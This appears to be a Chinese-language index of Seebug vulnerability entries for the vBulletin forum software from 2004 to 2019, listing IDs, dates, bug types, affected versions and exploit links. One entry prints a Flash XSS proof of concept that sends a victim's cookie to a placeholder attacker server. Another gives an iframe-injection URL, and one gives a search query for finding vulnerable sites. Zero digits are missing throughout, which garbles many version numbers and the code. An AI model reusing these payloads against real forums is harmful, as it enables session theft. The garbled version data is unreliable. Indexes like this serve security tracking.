SSV-15384
Date:
2004.11 漏洞类别:
SQL 注入
SSV-15476
Date:
2005.2
漏洞类别:
RCE
SSV-15482
Date:
2005.2 类型:
RCE
SSV-15475
Date:
2005.2
SSV-15647
Date:
2005.8 类型:
RCE
SSV-15669
Date:
2005.8 类型:
RCE
SSV-15743
漏洞类别:
SQL 注入
SSV-15988
Date:
2006.4 漏洞类别:
RCE
SSV-5410
Date:
2006.10 漏洞类别:
远程溢出
SSV-402
Date:
2006.11 漏洞类别:
嵌入恶意代码 影响范围:
Microsoft IE在处理vBulletin的附件时存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行恶意代码。
远程攻击者可以将恶意代码保存为.pdf文件并在张贴时做为附件上传到论坛,这样用户在IE中打开附件时就会导致执行任意代码。
VBulletin VBulletin 3.5. 目前厂商还没有提供补丁或者升级程序
SSV-1033
Date:
2006.12 漏洞类别:
SQL 注入 影响范围:
vBulletin在处理恶意SWF文件时存在漏洞,远程攻击者可能利用此漏洞获取用户机器的敏感信息。
如果攻击者能够向vBulletin上传包含有恶意actionscript帧的SWF文件的话,就可能执行跨站脚本攻击,导致在日志文件中泄露基于cookie的认证凭据。
VBulletin VBulletin <= 3.6. 目前厂商还没有提供补丁或者升级程序 PoC:
getURL("javascript:function blab(){}var scriptNode = document.createElement('script');document.getElementsByTagName('body')[].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+
SSV-16875
Date:
提交时间:2007.02 漏洞类别:
SQL 注入
SSV-6259
Date:
2007.3 漏洞类别:
SQL 注入
SSV-6874
Date:2007.05 漏洞类别:
远程文件包含
SSV-7036
Date:
2007.07 漏洞类别:
SQL 注入
SSV-3433
Date:
2008.06 漏洞类别:
嵌入恶意代码 影响范围:
vBulletin管理控制面板(ACP)的登录页面没有正确地验证redirect参数,远程攻击者可以通过向论坛提交使用data: URI主题Base64编码的登录请求执行跨站脚本攻击。
VBulletin VBulletin 3.7. VBulletin VBulletin 3.6.
SSV-3582
Date:
2008.07 漏洞类别:
SQL 注入 影响范围:
vBulletin管理控制面板的日志查看页面存在跨站脚本漏洞。如果用户请求了缺失的页面时,就会在管理区域创建日志,但没有过滤检查该日志的输入。脚本名称是从basename(PHP_SELF)获得的,操作是从_REQUEST['do']获得的,这两种方式都可能导致跨站脚本攻击。
VBulletin VBulletin 3.7.2 VBulletin VBulletin 3.6.10 PL2
SSV-3897
Date:
2008.8 漏洞类别:
跨站脚本 影响范围:
vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
vBulletin 3.7.2 Patch Level 1 and vBulletin 3.6.10 Patch Level 3 are vulnerable; other versions may also be affected.
VBulletin VBulletin 3.7.2 PL1 VBulletin VBulletin 3.6.10 PL3
SSV-4467
Date:
2008.11 漏洞类别:
SQL 注入 影响范围:
vBulletin论坛的admincp/admincalendar.php文件没有正确地验证用户提交参数: -------------------[original source code]------------------ if($_POST['do'] == 'saveholiday') { $vbulletin->input->clean_array_gpc('p', array( 'holidayid' => TYPE_INT, 'holidayinfo' => TYPE_ARRAY, 'month1' => TYPE_INT, 'day1' => TYPE_INT, 'month2' => TYPE_INT, 'day2' => TYPE_INT, 'period' => TYPE_INT, 'title' => TYPE_STR, 'description' => TYPE_STR, )); .. $db->query_write(" UPDATE " . TABLE_PREFIX . "holiday SET allowsmilies = " . $vbulletin->GPC['holidayinfo']['allowsmilies'] . ", recuroption = '" . $vbulletin->GPC['holidayinfo']['recuroption'] . "', recurring = " . $vbulletin->GPC['holidayinfo']['recurring'] . " WHERE holidayid = " . $vbulletin->GPC['holidayid'] ); ------------------[/original source code]------------------ 可见未经任何过滤便在UPDATE查询中使用了来自$_POST的数组类型变量holidayinfo,这允许远程攻击者通过提交恶意请求执行SQL注入攻击。 VBulletin 3.7. pl1
SSV-10072
Date:
2008.11 漏洞类别:
XSS
SSV-10205
Date:
2008.11 漏洞类别:
SQL 注入
SSV-5017
Date:
2009.4 漏洞类别:
嵌入恶意代码 影响范围:
vBulletin管理控制台的admincp/usertitle.php、admincp/image.php模块没有正确地验证用户所提交的 Users、Icons、Smilies、avatar等参数,远程攻击者可以提交包含有脚本代码的恶意标题名称导致注入并执行任意HTML代码。
VBulletin 3.8.0 RC2
SSV-11434
Date:
2009.5 漏洞类别:
SQL 注入
SSV-11634
Date:
2009.6 漏洞类别:
嵌入恶意代码
SSV-12444
Date:
2009.10 漏洞类别:
跨站脚本
SSV-18866
Date:
2009.12 漏洞类别:
SQL 注入
SSV-18867
Date:
2009.12 漏洞类别:
SQL 注入
SSV-18924
Date:
2010.1 漏洞类别:
跨站脚本
SSV-19032
Date:
2010.1 漏洞类别:
SQL 注入
SSV-19240
Date:
2010.3 漏洞类别:
跨站脚本 影响范围:
search.php在对用户提交数据处理上存在安全漏洞。
http://www.vbulletin.com/forum/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Ciframe%20src=http://www.gohack.org%3E
vBulletin Version 4.0. 等待官方发补丁
SSV-19339
Date:
2010.3 漏洞类别:
跨站脚本 影响范围:
当search_type设置为1的时候,vBulletin没有正确的过滤提交给search.php页面的query参数便返回给了用户,远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击,导致在用户浏览器会话中执行任意HTML和脚本代码。
VBulletin 4.0.
SSV-19441
Date:
2010.04 漏洞类别:
其他类型
SSV-19488
Date:
2010.4 漏洞类别:
跨站脚本
SSV-19578
Date:
2010.05 漏洞类别:
嵌入恶意代码
SSV-19580
Date:
2010.5 漏洞类别:
嵌入恶意代码 影响范围:
vBulletin在创建使用自定义标签的内容时没有正确地解析BBCode,这允许攻击者注入任意HTML和脚本代码,当查看恶意数据时就会在用户浏览器会话中执行所注入的代码。
VBulletin 4.0.3 VBulletin 3.8.4 PL2
SSV-20074
Date:
2010.8 漏洞类别:
越权访问
SSV-20090
Date:
2010.9 漏洞类别:
拒绝服务
SSV-20248
Date:
2010.11 漏洞类别:
跨站脚本
SSV-20257
Date:
2010.11 漏洞类别:
嵌入恶意代码 影响范围:
vBulletin的Profile Customization功能中存在持续性跨站脚本漏洞。在配置文件的自定义字段,可以输入颜色代码、rgb代码和图形。由于url()函数没有正确的过滤用户输入,导致vBulletin受跨站脚本攻击的影响。
VBulletin 4.0.
SSV-20360
Date:
2011.03 漏洞类别:
SQL 注入
SSV-20647
Date:
2011.6 漏洞类别:
SQL 注入
SSV-20753
Date:
2011.7 漏洞类别:
SQL 注入
SSV-23171
Date:
2011.11 漏洞类别:
远程文件包含 影响范围:
vBulletin在实现上存在多个远程文件包含漏洞,攻击者可利用这些漏洞获取敏感信息或在服务器进程中执行任意脚本代码,控制应用程序或计算机。
VBulletin 4.1.7
SSV-30029
Date:
2012.1 漏洞类别:
越权访问 影响范围:
vBulletin blog_post.php脚本不正确检查权限,远程攻击者可以利用漏洞张贴博客日志 vBulletin .x vBulletin Publishing Suite .x
SSV-60024
Date:
2012.4 漏洞类别:
SQL 注入 影响范围:
VBulletin announcement.php脚本不正确处理提交给announcementid的参数,攻击者可以提交恶意SQL查询,获得敏感数据库信息或控制应用系统 VBulletin 4.1.
SSV-60086
Date:
2012.5 漏洞类别:
远程文件包含
SSV-60194
Date:
2012.6 漏洞类别:
SQL 注入
SSV-60393
Date:
2012.9 漏洞类别:
SQL 注入 影响范围:
VBulletin 'blog_plugin_useradmin.php'脚本不正确过滤用户提交的输入,允许攻击者利用漏洞进行SQL注入攻击,可获得数据库信息或控制应用系统。 VBulletin 4.1.
SSV-60503
Date:
2012.12 漏洞类别:
SQL 注入
SSV-60717
Date:
2013.4 漏洞类别:
SQL 注入 影响范围:
VBulletin 5.0. Beta - 5.0. Beta 28及其他版本在 'nodeid' 参数的实现上存在SQL注入漏洞,攻击者可利用此漏洞破坏应用,执行未授权操作
SSV-60917
Date:
2013.7 漏洞类别:
SQL 注入
SSV-61063
Date:
2013.10 漏洞类别:
越权访问 影响范围:
vBulletin 4.x.x及5.x.x允许攻击者利用vBulletin配置机制创建另一个管理员账户,即可具有vBulletin应用的完全控制权,然后控制其所支持的站点。要利用此漏洞,攻击者需要具有vBulletin upgrade.php准确的URL及用户ID 0 VBulletin 5.x VBulletin 4.x
SSV-75692 CVE-ID:CVE-2002-1660
Date:
- 漏洞类别:
其他类型
SSV-75761
Date:
2014.7 漏洞类别:
其他类型
SSV-75843 CVE-ID:CVE-2004-1824
Date:
2004.12 漏洞类别:
其他类型
SSV-75855 CVE-ID:CVE-2002-2235
Date:
- 漏洞类别:
其他类型
SSV-75890
Date:
2014.7 漏洞类别:
其他类型
SSV-76231
Date:
- 漏洞类别:
其他类型
SSV-76398 CVE-ID:CVE-2003-0295
Date:
- 漏洞类别:
其他类型
SSV-76455
Date:
2014.7 漏洞类别:
其他类型
SSV-63007 CVE-ID:CVE-2005-0429
Date:
- 漏洞类别:
其他类型
SSV-63009 CVE-ID:CVE-2005-0429
Date:
- 漏洞类别:
其他类型
SSV-63014 CVE-ID:CVE-2005-0511
Date:
- 漏洞类别:
其他类型
SSV-63185
Date:
2014.7 漏洞类别:
其他类型
SSV-63212
Date:
2014.7 漏洞类别:
其他类型
SSV-63470
Date:
2014.7 漏洞类别:
其他类型
SSV-64472 CVE-ID:CVE-2007-0865
Date:
2007.2 漏洞类别:
其他类型
SSV-65777 CVE-ID:CVE-2008-4706
Date:
2008.10 漏洞类别:
其他类型
SSV-65949
Date:
2014.7 漏洞类别:
其他类型
SSV-66028
Data:
2014.7 漏洞类别:
其他类型
SSV-66566
Date:
2014.7 漏洞类别:
其他类型
SSV-67672
Date:
2014.7 类型:
XSS Vulnerabilities 受影响版本:
vBulletin 3.5.
SSV-67673
Date:
- 类型:
XSS Vulnerability 受影响版本:
vBulletin 3.0.
SSV-67674
Date:
2014.7 漏洞类型:
SQL Injection Vulnerability 受影响版本:
vBulletin 2.3 .x
SSV-67769 CVE-ID:CVE-2010-1077
Date:
2010.3 漏洞类型:
Local File Inclusion Vulnerability 受影响版本:
vBSEO 3.1.
SSV-68020
Date:
2010.3 漏洞类型:
Title XSS Vulnerability 受影响版本:
Vbulletin Blog 4.0.
SSV-68241
Date:
2010.4 类型:
DOS PoC:
- http://www.exploit-db.com/exploits/12154
SSV-68269
Date:
2014.7 类型:
DOS
SSV-68366 | CVE-2010-1499
Date:
2010.4 漏洞类型:
SQL Injection Exploit 受影响版本:
MusicBox 3.3
SSV-69473
Date:
2014.7 漏洞类型:
faq.php Information Disclosure Vulnerability 受影响版本:
vBulletin(R) 3.8.
SSV-69735
Date:
2010.8 漏洞类型:
Registration Bypass Vulnerability 受影响版本:
vBulletin 3.8. & 3.8.
SSV-70261
Date:
2010.11 漏洞类型:
PL1 XSS Filter Bypass within Profile Customization 受影响版本:
vBulletin 4.0.
SSV-71391 CVE-ID:CVE-2005-0511
Date:
2005.2 漏洞类型:
vBulletin misc.php Template Name Arbitrary Code Execution 受影响版本:
All versions of vBulletin prior to 3.0. are affected.
SSV-71425
Date:
2011.3 漏洞类型:
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability
受影响版本:
vBulletin 3.8.x
SSV-71428 | 2011-03-07
Date:
2011.3 漏洞类型:
Local File Read 受影响版本: EggAvatar 2.3. for vBulletin 3.8.x
SSV-71590
Date:
2011.4 漏洞类型:
Point Market System .1x vbulletin plugin SQLi Vulnerability 受影响版本:
.1x
SSV-71714
Date:
2011.5 漏洞类型:
vBulletin 4.0.x => 4.1. - (search.php) SQL Injection Vulnerability 受影响版本:
4.0.x
SSV-71893
Date:
2011.7 漏洞类型:
(messagegroupid) SQL Injection Vulnerability 受影响版本:
Vbulletin 4.0.x => 4.1.
SSV-74805
Date:
2012.8 类型:
SQL Injection
影响版本:
4.0.+
SSV-76775 | CVE-2003-1031
Date:
2003.8 漏洞类型:
Register.PHP HTML Injection Vulnerability 影响范围:
vBulletin 3.0
SSV-77438
Date:
2004.2 类型:
Cross-Site Scripting Vulnerability 影响版本:
VBulletin 1.0/1.1/2.0.x/2.2.x
SSV-77441 CVE-ID:CVE-2004-2076
Date:
2004.12 类型:
Search.PHP Cross-Site Scripting Vulnerability 影响版本:
VBulletin 3.0
SSV-77571 CVE-ID:CVE-2004-1823
Date:
2004.3 漏洞类型:
ForumDisplay.PHP Cross-Site Scripting Vulnerability 影响版本:
VBulletin 3.0
SSV-77572 CVE-ID:CVE-2004-1823
Date:
2004.3 漏洞类型:
ShowThread.PHP Cross-Site Scripting Vulnerability
影响版本:
VBulletin 3.0
SSV-77610
Date:
2004.03 漏洞类型:
Private.PHP Cross-Site Scripting Vulnerability 影响版本:
VBulletin 2.x
SSV-77860 CVE-ID:CVE-2004-2288
Date:
2004.5 类型:
'index.php' User Interface Spoofing 影响版本:
vBulletin 1.0/2.x/3.0
SSV-77967 CVE-ID:CVE-2004-0620
Date:
2004.6 类型:
newreply.php WYSIWYG_HTML Parameter XSS
影响版本:
VBulletin 3.0.
SSV-78568 CVE-ID:CVE-2013-3522
Date:
2013.3 类型:
SQL Injection
影响版本:
vBulletin 5.0. Beta - 5.0. Beta
SSV-79915 CVE-ID:CVE-2005-3019
Date:
2005.9 类型:
joinrequests.php request Parameter SQL Injection
影响版本:
VBulletin 1.0. lite/.x/3.0
SSV-79916 CVE-ID:CVE-2005-3019
Date:
2005.9 类型:
/admincp/user.php Multiple Parameter SQL Injection
影响版本:
VBulletin 1.0.1 lite/2.x/3.0
SSV-79917 CVE-ID:CVE-2005-3019
Date:
2005.9 类型:
'/admincp/usertitle.php?usertitleid' SQL Injection
影响版本:
vBulletin 1.0.1 lite/2.x/3.0
SSV-79918 CVE-ID:CVE-2005-3019
Date:
2005.9 类型:
'/admincp/usertools.php?ids' SQL Injection
影响版本:
vBulletin 1.0.1 lite/2.x/3.0 -
SSV-79920 CVE-2005-3020
Date:
2005.9 类型:
'/admincp/css.php?group' Cross-Site Scripting
影响版本:
vBulletin 1.0.1 lite/2.x/3.0 -
SSV-79921 CVE-2005-3020
Date:
2005.9 类型:
/admincp/index.php Multiple Parameter XSS
影响版本:
VBulletin 1.0.1 lite/2.x/3.0
SSV-79922 CVE-ID:CVE-2005-3020
Date:
2005.9 类型:
/admincp/user.php email Parameter XSS
影响版本:
VBulletin 1.0.1 lite/2.x/3.0
SSV-79923 CVE-2005-3020
Date:
2005.9 类型:
/admincp/language.php goto Parameter XSS
影响版本:
VBulletin 1.0.1 lite/2.x/3.0
SSV-79924 CVE-2005-3020
Date:
2005.9 类型:
/admincp/modlog.php orderby Parameter XSS
影响版本:
VBulletin 1.0.1 lite/2.x/3.0
SSV-79925 CVE-ID:CVE-2005-3020
Date:
2005.9 类型:
/admincp/template.php' Multiple Cross-Site Scripting Vulnerabilities
影响版本:
VBulletin 1.0.1 lite/2.x/3.0
SSV-80360
Date:
2013.7 类型:
vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability
影响版本:
Version: vBulletin 3.8.x, vBulletin 4.x.x
SSV-80361
Date:
2013.7 类型:
vBulletin vBShout Mod - Persistent Cross-Site Scripting
影响版本:
Version:
vBulletin 3.8.x, vBulletin 4.x.x, vBulletin 5.x.x
SSV-80640
Date:
2006.02 类型:
vBulletin 3.5.2 - Event Title HTML Injection
影响版本:
This issue is reported to affect vBulletin 3.5.2. Earlier versions may also be affected.
SSV-80956 CVE-ID:CVE-2006-1040
Date:
2006.03 类型:
vBulletin 3.0/3.5 - 'profile.php?Email' HTML Injection
影响版本:
This issue is reported to affect vBulletin versions 3.0.12 through 3.5.3. Other versions may also be affected.
SSV-81184 CVE-ID:CVE-2006-1673
Date:
2006.04 类型:
vBulletin 3.5.1 - 'Vbugs.php' Cross-Site Scripting
影响版本:
Version 3.5.1 is vulnerable; other versions may also be affected.
SSV-81519 CVE-ID:CVE-2006-2805
Date:
2006.05
类型:
vBulletin 3.0.10 - 'Portal.php' SQL Injection
影响版本:
vBulletin 3.0.10
SSV-81612
Date:
2006.06
类型:
vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities
影响版本:
vBulletin 2.x/3.x
SSV-81657 CVE-2006-3253
Date:
2006.06
类型:
Vbulletin 3.0.9/3.5.x Member.PHP Cross-Site Scripting Vulnerability
影响版本:
Vbulletin 3.0.9/3.5.x
SSV-81913 CVE-ID:CVE-2006-4273
Date:
2006.06
类型:
VBulletin 3.0.14 global.php Encoded URL XSS
影响版本:
VBulletin 3.0.14
SSV-82247 CVE-ID:CVE-2006-5104
Date:
2006.09
类型:
VBulletin 2.3.x Global.PHP SQL Injection Vulnerability
影响版本:
VBulletin 2.3.x
SSV-82617 CVE-ID:CVE-2006-6040
Date:
2006.11
类型:
vBulletin 3.6.x - Admin Control Panel Multiple Cross-Site Scripting Vulnerabilities
影响版本:
Versions 3.6.0 to 3.6.3 are vulnerable; other versions may also be affected.
SSV-82849 CVE-ID:CVE-2006-6779
Date:
2006.12 类型:
vBulletin 3.5.x/3.6.x - SWF Script Injection
影响版本:
vBulletin 3.5.x/3.6.x
SSV-83511 CVE-2007-2908
Date:
- 类型:
vBulletin 3.6. - 'calendar.php' HTML Injection
影响版本:
vBulletin 3.6.
SSV-83653 CVE-ID:CVE-2013-3522
Date:
- 类型:
vBulletin - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit) 影响版本:
vBulletin
SSV-85223 CVE-ID:CVE-2008-2744
Date:
.6 类型:
vBulletin 3.6./3.7. - 'redirect' Cross-Site Scripting 影响版本:
vBulletin 3.7. and 3.6. are vulnerable; other versions may also be affected.
SSV-85252
Date:
2008-06
类型:
vBulletin 3.7.1 - Moderation Control Panel 'redirect' Cross-Site Scripting
影响版本:
vBulletin 3.7.1 PL1 and 3.6.10 PL1 are vulnerable; prior versions may also be affected.
SSV-85324 CVE-ID:CVE-2008-3184
Date:
.7 类型:
vBulletin 3.7.1 - 'admincp/faq.php?Injection adminlog.php' Cross-Site Scripting
影响版本:
Versions prior to vBulletin 3.7.2 PL1 and 3.6.10 PL3 are vulnerable.
SSV-85580 CVE-ID:CVE-2008-3773
Date:
2008.8 类型:
vBulletin 3.6.10/3.7.2 - '$newpm[title]' Cross-Site Scripting
影响版本:
vBulletin 3.7.2 Patch Level 1 and vBulletin 3.6.10 Patch Level 3 are vulnerable; other versions may also be affected.
SSV-86755
Date:
- 类型:
vBulletin 4.0. - 'misc.php' SQL Injection 影响版本:
vBulletin 4.0.. is vulnerable; other versions may also be affected.
SSV-86826
Date:
- 类型:
vBulletin Adsense Component - 'viewpage.php' SQL Injection
SSV-86829
Date:
- 类型:
vBulletin 3.5. - Multiple Cross-Site Scripting Vulnerabilities 影响版本:
These issues affect vBulletin 3.0. through 3.5..
SSV-86865
Date:
2010.2 类型:
vBulletin 4.0. - Multiple Cross-Site Scripting Vulnerabilities 影响版本:
These issues affect vBulletin 4.0.; other versions may also be affected.
SSV-86970
Date:
- 类型:
vBulletin 4.0. - Search Cross-Site Scripting 影响版本:
vBulletin 4.0. is vulnerable. This issue does not affect vBulletin .x versions.
SSV-87029
Date:
- 类型:
vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting
SSV-87221
Date:
2014.9 类型:
vBulletin 4.0.x - 4.1. (search.php, cat param) - SQL Injection Exploit 影响版本:
vBulletin 4.0.x - 4.1.
SSV-87239
Date:
2014.9 类型:
vBulletin 5.1.X - Persistent Cross Site Scripting 影响版本:
vBulletin 5.1.X
SSV-87387
Date:
2014.11 类型:
vBulletin .x Verify Email Before Registration Plugin - SQL Injection 影响版本:
vBulletin .x
SSV-87389 CVE-ID:CVE-2014-2023
Date:
2014-11 类型:
vBulletin Tapatalk - Blind SQL Injection
SSV-89707 CVE-ID:CVE-2015-7808
Date:
2015.11 类型:
vBulletin 5.x.x 远程任意代码执行漏洞
影响版本:
vBulletin 5.x.x 社工:
http://www.zoomeye.org/search?q=app:vbulletin
SSV-91013
Date:
2016.3 类型:
vBulletin rce 未授权访问和SSRF漏洞
SSV-92266 CVE-ID:CVE-2016-6483
Date:
2016.8 类型:
VBULLETIN 5.2./5.2./5.2. MEDIA UPLOAD SSRF PRIVILEGE ESCALATION 影响版本:
VBULLETIN 5.2./5.2./5.2.2
vBulletin <= 5.2.2
vBulletin <= 4.2.3
vBulletin <= 3.8.9
SSV-92354 CVE-ID:CVE-2016-6195
Date:
2016.8 类型:
vBulletin /forumrunner/request.php SQL注入漏洞 影响版本:
3.6.x ~ 4.2.1
4.2.2 ~ 4.2.2 Patch Level 5
4.2.3 ~ 4.2.3 Patch Level 1
SSV-96981 CVE-ID:CVE-2017-17672
Date:
2017.12 类型:
vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion(CVE--) 影响版本:
version .x
SSV-96982
Date:
2017.12 类型:
vBulletin routestring Unauthenticated Remote Code Execution 影响版本:
version .x
SSV-98077
Date:
2019.9 类型:
vBulletin .x 0day pre-auth RCE exploit 影响版本:
version .x | versions from 5.0.0 till 5.5.4
CVE-2019-16759
Date:
2019.9 类型:
vBulletin .x 0day pre-auth RCE exploit 影响版本:
vBulletin .x | from 5.0. till 5.5.4 PoC:
https://seclists.org/fulldisclosure/2019/Sep/31
SSV-98084 CVE-2019-17132
Date:
2019.10 类型:
SQL | RCE 影响范围:
vBulletin <= 5.5. (updateAvatar) Remote Code Execution Vulnerability EXP |Patch released:
https://www.exploit-db.com/exploits/47475